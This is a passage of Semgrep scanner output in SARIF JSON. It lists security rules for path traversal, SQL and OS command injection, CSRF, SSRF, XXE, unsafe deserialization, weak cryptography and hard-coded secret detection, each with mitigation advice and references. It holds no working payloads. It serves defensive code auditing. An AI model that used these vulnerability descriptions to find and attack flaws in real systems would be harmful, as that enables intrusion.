os.path.abspath or os.path.realpath or Path library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","id":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","name":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"help":{"markdown":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"helpUri":"https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","id":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","name":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite)\n - [https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application](https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","id":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","name":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"help":{"markdown":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure)\n - [https://cwe.mitre.org/data/definitions/209.html](https://cwe.mitre.org/data/definitions/209.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n","text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","id":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","name":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","properties":{"precision":"very-high","tags":["CWE-209: Generation of Error Message Containing Sensitive Information","HIGH CONFIDENCE","OWASP-A04:2021 - Insecure Design","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","id":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","name":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","id":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","name":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection)\n - [https://www.php.net/manual/en/ref.exec.php](https://www.php.net/manual/en/ref.exec.php)\n - [https://www.php.net/manual/en/ref.filesystem.php](https://www.php.net/manual/en/ref.filesystem.php)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection","id":"php.laravel.security.laravel-command-injection.laravel-command-injection","name":"php.laravel.security.laravel-command-injection.laravel-command-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-command-injection.laravel-command-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","id":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","name":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"help":{"markdown":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv)\n - [https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection](https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection)\n","text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv","id":"python.lang.security.audit.conn_recv.multiprocessing-recv","name":"python.lang.security.audit.conn_recv.multiprocessing-recv","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.conn_recv.multiprocessing-recv"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"help":{"markdown":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection)\n - [https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n","text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection","id":"javascript.express.security.audit.remote-property-injection.remote-property-injection","name":"javascript.express.security.audit.remote-property-injection.remote-property-injection","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.remote-property-injection.remote-property-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"help":{"markdown":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password)\n - [https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation](https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation)\n","text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password","id":"python.django.security.audit.unvalidated-password.unvalidated-password","name":"python.django.security.audit.unvalidated-password.unvalidated-password","properties":{"precision":"very-high","tags":["CWE-521: Weak Password Requirements","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.unvalidated-password.unvalidated-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"help":{"markdown":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"helpUri":"https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg","id":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","name":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.java-jwt.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled)\n - [https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/](https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/)\n - [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)\n","text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","id":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","name":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Outlook Team detected"},"help":{"markdown":"Outlook Team detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Outlook Team detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team","id":"generic.secrets.security.detected-outlook-team.detected-outlook-team","name":"generic.secrets.security.detected-outlook-team.detected-outlook-team","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-outlook-team.detected-outlook-team"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"help":{"markdown":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors.\n\nReferences:\n - [Semgrep 